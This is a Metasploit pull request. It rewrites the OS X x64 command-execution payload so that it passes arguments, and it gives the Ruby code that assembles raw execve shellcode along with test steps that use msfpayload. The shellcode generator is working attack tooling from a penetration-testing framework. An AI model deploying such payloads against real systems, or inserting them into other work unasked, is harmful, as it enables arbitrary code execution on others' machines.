### PR TITLE
Rewrite osx x64 cmd payload to accept args.

### DIFF
--- a/modules/payloads/singles/osx/x64/exec.rb
+++ b/modules/payloads/singles/osx/x64/exec.rb
@@ -16,33 +16,47 @@ module Metasploit3
 		super(merge_info(info,
 			'Name'          => 'OS X x64 Execute Command',
 			'Description'   => 'Execute an arbitrary command',
-			'Author'        => 'argp <argp[at]census-labs.com>',
+			'Author'        => [ 'argp <argp[at]census-labs.com>',
+			                     'joev <jvennix[at]rapid7.com>' ],
 			'License'       => MSF_LICENSE,
 			'Platform'      => 'osx',
 			'Arch'          => ARCH_X86_64
 		))
 
 		# exec payload options
-		register_options(
-			[
-				OptString.new('CMD',  [ true,  "The command string to execute" ]),
+		register_options([
+			OptString.new('CMD',  [ true,  "The command string to execute" ])
 		], self.class)
 	end
 
 	# build the shellcode payload dynamically based on the user-provided CMD
 	def generate
-		cmd = (datastore['CMD'] || '') << "\x00"
-		call = "\xe8" + [cmd.length].pack('V')
+		cmd_str = datastore['CMD'] || ''
+		# Split the cmd string into arg chunks
+		cmd_parts = Shellwords.shellsplit(cmd_str)
+		cmd_parts = ([cmd_parts.first] + (cmd_parts[1..-1] || []).reverse).compact
+		arg_str = cmd_parts.map { |a| "#{a}\x00" }.join
+		call = "\xe8" + [arg_str.length].pack('V')
 		payload =
 			"\x48\x31\xc0" +                                # xor rax, rax
-			"\x48\xb8\x3b\x00\x00\x02\x00\x00\x00\x00" +    # mov rax, 0x200003b (execve)
 			call +                                          # call CMD.len
-			cmd +                                           # CMD
-			"\x48\x8b\x3c\x24" +                            # mov rdi, [rsp]
-			"\x48\x31\xd2" +                                # xor rdx, rdx
-			"\x52" +                                        # push rdx
-			"\x57" +                                        # push rdi
-			"\x48\x89\xe6" +                                # mov rsi, rsp
+			arg_str  +                                      # CMD
+			"\x5f" +                                        # pop rdi
+			if cmd_parts.length > 1
+				"\x48\x89\xf9" +                            # mov rcx, rdi
+				"\x50" +                                    # push null
+				# for each arg, push its current memory location on to the stack
+				cmd_parts[1..-1].each_with_index.map do |arg, idx|
+					"\x48\x81\xc1" +                        # add rcx + ...
+					[cmd_parts[idx].length+1].pack('V') +   #
+					"\x51"                                  # push rcx (build str array)
+				end.join
+			else
+				"\x50"                                      # push null
+			end +
+			"\x57"+                                         # push rdi
+			"\x48\x89\xe6"+	                                # mov rsi, rsp
+			"\x48\xc7\xc0\x3b\x00\x00\x02" +                # mov rax, 0x200003b (execve)
 			"\x0f\x05"                                      # syscall
 	end
 end


### PR DESCRIPTION
### RM #8260: bug/osx-x64-payload-doesnt-accept-args
#### Check for regressions
- [x] Checkout master. Generate an OSX x64 cmd exec payload:
  
  ```
  $ git checkout master
  $ ./msfpayload osx/x64/exec CMD="/bin/ls" X > ~/Desktop/exec64.bin
  ```
- [x] Ensure that running the payload binary results in your root dir being listed:
  
  ```
  $ chmod +x ~/Desktop/exec64.bin
  $ arch -x86_64 ~/Desktop/exec64.bin
  Shared          blankslate      joe
  ...
  ```
- [x] Checkout this branch (`bug/osx-x64-payload-doesnt-accept-args`) and generate the same payload:
  
  ```
  $ git checkout bug/osx-x64-payload-doesnt-accept-args
  $ ./msfpayload osx/x64/exec CMD="/bin/ls" X > ~/Desktop/exec64_fix.bin
  ```
- [x] Ensure that running the cmd results in your root dir being listed:
  
  ```
  $ chmod +x ~/Desktop/exec64_fix.bin
  $ arch -x86_64 ~/Desktop/exec64_fix.bin
  Shared          blankslate      joe
  ...
  ```
- [x] Disassemble and compare the two payloads:

![64diff](https://f.cloud.github.com/assets/1184013/886377/76faaf7c-f9e8-11e2-9a1f-c98ab54244d7.png)
#### Verify new behavior
- [x] Compile the following C program:
  
  ```
  #include <stdio.h>
  
  int main(int argc, char *argv[]) {
    int x;
    for (x = 0; x < argc; x++) {
      printf("%s\n", argv[x]);
    }
    return 0;
  }
  
  $ gcc print_args.c -O ~/Desktop/print_args
  ```
- [x] Generate a payload that calls this file:
  
  ```
  $ ./msfpayload osx/x64/exec CMD="/Users/joe/Desktop/print_args a bb ccc dddd eeeee ffffff ggggggg hhhhhhhh" X > ~/Desktop/exec64_print_args.bin
  $ chmod +x ~/Desktop/exec64_print_args.bin
  ```
- [x] Run the payload, verify that you see the following output:
  
  ```
  $ arch -x86_64 ~/Desktop/exec64_print_args.bin
  /Users/joe/Desktop/print_args
  a
  bb
  ccc
  dddd
  eeeee
  ffffff
  ggggggg
  hhhhhhhh
  ```
